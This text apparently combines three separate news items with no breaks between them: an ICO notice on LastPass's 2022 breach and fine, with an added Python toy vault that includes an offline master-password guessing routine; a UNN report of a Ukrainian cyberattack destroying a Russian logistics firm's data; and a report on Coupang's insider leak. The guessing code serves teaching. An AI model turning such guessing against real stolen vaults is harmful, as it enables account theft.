The incidents occurred in August 2022 when a hacker gained access first to a corporate laptop of an employee based in Europe and then to a US-based employee’s personal laptop on which the hacker implanted malware and then was able to capture the employee’s master password. The combined detail from both incidents enabled the hacker to access LastPass’ backup database and take personal information which included customer names, emails, phone numbers, and stored website URLs.
John Edwards, UK Information Commissioner, said:
“Password managers are a safe and effective tool for businesses and the public to manage their numerous login details and we continue to encourage their use. However, as is clear from this incident, businesses offering these services should ensure that system access and use is restricted to ensure risks of attack are significantly reduced.
“LastPass customers had a right to expect the personal information they entrusted to the company would be kept safe and secure. However, the company fell short of this expectation, resulting in the proportionate fine being announced today.
"I call on all UK businesses to take note of the outcome of this investigation and urgently review their own systems and procedures to make sure, as best as possible, that they are not leaving their customers and themselves exposed to similar risks."
Details of the two incidents
Incident one
A hacker compromised a LastPass employee’s corporate laptop and gained access to the company’s development environment.
No personal information was taken; however, encrypted company credentials were. If decrypted, these would allow access to the company's backup database.
LastPass took steps to mitigate the hacker’s activity and believed encryption keys remained safe as they were stored outside of the area accessed by the hacker in the account vaults of four senior employees.
Incident two
The hacker then targeted one of the senior employees who had access to the decryption keys, gaining access to their personal device via a known vulnerability in a third-party streaming service.
A keylogger was installed, capturing the employee's master password, and multi-factor authentication was bypassed using a trusted-device cookie.
The hacker then gained access to the employee’s personal and business LastPass vaults, which were linked using a single master password.
The hacker then gained access to the employee's business vault, which contained the Amazon Web Services (AWS) access key and the decryption key.
This information, combined with information taken the day before, enabled the hacker to extract the contents of the backup database which contained the personal information.
Our investigation found no evidence that the hacker was able to decrypt the encrypted passwords and other credentials. This is due to LastPass' use of a 'zero knowledge' encryption system, whereby the master password required to access a password vault is stored locally on a customer's own device and never shared with LastPass.
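The property the ICO is describing, as an added Python illustration: the server holds ciphertext plus a verifier derived from the master password, never the master password or the vault key, so a stolen backup gives an attacker metadata and ciphertext but not the passwords unless the master password is weak enough to guess offline. This is not LastPass's code, parameters or key schedule and is not from the ICO's notice; the two-stage PBKDF2 split, the HMAC-based stream cipher (a stand-in for an AEAD such as AES-GCM, which the standard library lacks), the iteration count and all accounts are constructed for the example. The plaintext URL list on the server mirrors the ICO's account that stored website URLs were among the data taken, and the offline-guessing function shows the caveat a practitioner cares about: "zero knowledge" protects exactly as well as the master password and KDF cost allow.

```python
"""Toy zero-knowledge vault. Added illustration; not LastPass's code or
parameters. The key schedule, the HMAC stream cipher standing in for AES-GCM,
the iteration count and every account here are constructed."""
import hashlib
import hmac
import os

KDF_ITERATIONS = 100_000  # illustration only; production counts should be far higher


def derive_keys(master_password: str, email: str, iterations: int = KDF_ITERATIONS):
    """Client side only. The vault key never leaves the device; the auth key is
    one more KDF step away from it, so the server's verifier cannot be turned
    back into the vault key."""
    vault_key = hashlib.pbkdf2_hmac("sha256", master_password.encode(),
                                    email.lower().encode(), iterations, 32)
    auth_key = hashlib.pbkdf2_hmac("sha256", vault_key, master_password.encode(), 1, 32)
    return vault_key, auth_key


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode; a stand-in for a real AEAD's cipher."""
    blocks, counter = [], 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]


def seal(vault_key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC with subkeys split off the vault key. Output: nonce || ct || tag."""
    enc_key = hmac.new(vault_key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(vault_key, b"mac", hashlib.sha256).digest()
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(vault_key: bytes, blob: bytes):
    """Return the plaintext, or None if the key is wrong or the blob was tampered with."""
    enc_key = hmac.new(vault_key, b"enc", hashlib.sha256).digest()
    mac_key = hmac.new(vault_key, b"mac", hashlib.sha256).digest()
    if len(blob) < 48:
        return None
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        return None
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


class VaultServer:
    """What the provider stores. Note what is *not* here: the master password or
    the vault key. The URL list is kept in the clear to mirror the ICO's account
    that stored website URLs were among the data taken."""

    def __init__(self):
        self.db = {}

    def register(self, email: str, auth_key: bytes, blob: bytes, urls):
        # a real server would also salt-and-stretch the auth key before storing it
        self.db[email.lower()] = {"auth_hash": hashlib.sha256(auth_key).hexdigest(),
                                  "vault": blob, "urls": list(urls)}

    def login(self, email: str, auth_key: bytes) -> bool:
        rec = self.db.get(email.lower())
        return rec is not None and hmac.compare_digest(
            rec["auth_hash"], hashlib.sha256(auth_key).hexdigest())

    def backup_dump(self):
        """The attacker's view after exfiltrating the backup database."""
        return {e: dict(r) for e, r in self.db.items()}


def offline_guess(dump, email: str, candidates, iterations: int = KDF_ITERATIONS):
    """Attacker holding the dump: try master passwords until the vault's MAC
    verifies. Succeeds only if the master password is in the candidate list,
    which is why 'zero knowledge' still depends on a strong master password
    and an expensive KDF."""
    rec = dump.get(email.lower())
    if rec is None:
        return None
    for pw in candidates:
        vault_key, _ = derive_keys(pw, email, iterations)
        if unseal(vault_key, rec["vault"]) is not None:
            return pw
    return None
```

Two things follow from running it: the dump never contains the vault plaintext and the auth verifier does not decrypt anything, but a master password that appears in a wordlist falls to the offline loop at the cost of one KDF evaluation per guess. The knobs that matter to a defender are therefore the master-password policy and the KDF iteration count, and on the server side the access controls around the backup itself, which is the failure the ICO actually fined.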
Advice and guidance
We urge organisations to ensure internal security policies explicitly consider and address data breach risks. Where risks are identified, access should be restricted to specific user groups.
Businesses wishing to review their procedures should turn to our and the National Cyber Security Centre websites which provide a rich source of information detailing ways to improve practices including Working from home – security checklist for employers, Data security guidance and Device security guidance.
Kyiv • UNN - unn.ua | УНН
December 6 2025
On December 6, the HUR MOD Cyber Corps and BO Team attacked the Russian logistics company "Eltrans+". Over 700 computers and servers were deactivated, 165 terabytes of data were destroyed, and network equipment was disabled.
The HUR Cyber Corps attacked one of Russia's leading logistics companies on the night of December 6: more than 700 computers and servers were deactivated and 165 terabytes of critical data were destroyed or encrypted, UNN reports with reference to sources.
On the night of December 6, specialists from the Main Intelligence Directorate of the Ministry of Defense, together with the BO Team, launched a cyberattack on the information and communication infrastructure of the Eltrans + group of companies. As a result of the attack, more than 700 computers and servers were deactivated, more than a thousand company users were deleted, and 165 terabytes of critical data were destroyed or encrypted.
According to the UNN interlocutor, the access control system, video surveillance data storage and backup system were also affected; network equipment, along with the core of the data center, was deactivated and disabled; declarations for all cargo were destroyed; and all company websites were "defaced" and now greet Russian users with the Day of the Armed Forces of Ukraine.
In addition
"Eltrans+" is among the top 10 largest customs representatives and freight forwarders in Russia. More than 5,000 Russian small, medium and large businesses use the services of "Eltrans+".
The company carries out international and domestic transportation (road, sea, air, multimodal), warehouse storage, transportation of consolidated cargo, as well as full customs clearance of goods.
"Eltrans+" is engaged in the delivery of sanctioned goods, as well as various electronic components from China, which are used by the Russian military-industrial complex, the UNN interlocutor reported.
koreajoongangdaily.joins.com
BY LEE YOUNG-KEUN, KIM JI-HYE
The former Coupang employee accused of leaking the data of 33.7 million customers had worked at the company for just two years, according to police on Thursday.
According to the Seoul Metropolitan Police Agency and sources familiar with the case who spoke to the JoongAng Ilbo, the suspect in the data breach — identified as a 43-year-old developer and Chinese national — was affiliated with Coupang's Seoul office. The person joined Coupang in November 2022 and was assigned to work on a key management security system before leaving the company late last year.
"It's difficult to understand from a common sense perspective why a newly hired developer with foreign nationality would be given access to sensitive customer information, especially in today's security-conscious corporate environment," said an industry source. "Given that such duties typically require strict security training and pledges, it raises questions about whether the company's protocols were adequate."
Coupang disclosed on Nov. 29 that approximately 33.7 million customer accounts had been exposed. The compromised data includes names, email addresses, saved delivery addresses, partial order histories and, in some cases, access codes for shared building entrances.
Due to the massive scale of the breach, police have been raiding Coupang’s headquarters in Songpa District, southern Seoul, for three consecutive days since Tuesday. Thursday's raid began around 9:40 a.m. Investigators are focused on securing records that can explain how the suspect allegedly gained access to Coupang’s security system and extracted the data. These include internal documents, work logs and system records related to the key management platform the suspect worked on during the employment period.
Police are also analyzing logs stored in the company’s security system, such as IP addresses, user credentials and access histories.
Coupang filed a criminal complaint with police on Nov. 25 regarding the leak. The police initially began an investigation based on documents submitted voluntarily by the company, but launched a compulsory search starting Tuesday. Investigators plan to trace the suspect’s methods and movements using the evidence collected in the raid. If Coupang’s negligence or legal violations are uncovered in the process, the company — currently treated as the victim — and employees responsible for handling personal information may also become subjects of investigation.
Meanwhile, the number of phishing scams linked to the Coupang breach has surged in recent days. According to Democratic Party lawmaker Lee Jeong-heon of the National Assembly’s Science, ICT, Broadcasting and Communications Committee, police received 229 phishing reports between Nov. 30 and Tuesday.
Most reports involved scams impersonating Coupang and offering fake compensation or claiming to be sending deliveries. Other familiar tactics, such as fake product review programs or phony prize announcements, were also used — many of which predate the breach.
“This incident is raising serious concerns over secondary damage such as phishing crimes,” Lee said. “Coupang and Executive Chairman Kim Bom must stop hiding behind silence and urgently take responsibility with transparent disclosure and a comprehensive compensation plan.”